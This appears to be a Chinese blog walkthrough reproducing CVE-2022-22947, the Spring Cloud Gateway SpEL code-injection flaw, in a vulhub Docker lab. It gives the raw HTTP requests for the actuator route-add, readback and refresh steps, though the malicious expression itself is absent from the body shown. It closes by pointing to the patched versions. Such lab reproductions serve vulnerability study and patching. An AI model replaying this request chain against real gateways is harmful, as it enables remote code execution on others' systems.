Spring Cloud Gateway是基于Spring framework 和 Spring Boot构建的API网关,它旨在为微服务架构提供一种简单、有效、统一的API路由管理方式。华为云提醒使用Spring Cloud Gateway的用户及时安排自检并做好安全加固。
参考链接:
CVE-2022-22947: Spring Cloud Gateway Code Injection Vulnerability
CVE-2022-22947: SPEL CASTING AND EVIL BEANS
0x02 漏洞环境推荐直接vulhub,干净卫生,兄弟们
vulhub/spring/CVE-2022-22947 at master · vulhub/vulhub (github.com)
docker-compose up -d
服务启动后,访问http://your-ip:8080即可看到演示页面
0x03 漏洞复现利用这个漏洞需要分多步。
首先,发送如下数据包即可添加一个包含恶意SpEL表达式的路由:
(此处的payload是升级之后的 ,利用AddResponseHeader去达到回显)
POST /actuator/gateway/routes/hacktest HTTP/1.1 Host: localhost:8080 Accept-Encoding: gzip, deflate Accept: ** Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 0
发送如下数据包即可查看执行结果:
GET /actuator/gateway/routes/hacktest HTTP/1.1 Host: localhost:8080 Accept-Encoding: gzip, deflate Accept: ** Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close
再刷新下路由:
POST /actuator/gateway/refresh HTTP/1.1 Host: localhost:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 0
再触发,路由已经没有了
0x05 修复升级最新版
目前官方已发布修复版本修复了该漏洞
https://github.com/spring-cloud/spring-cloud-gateway/tags
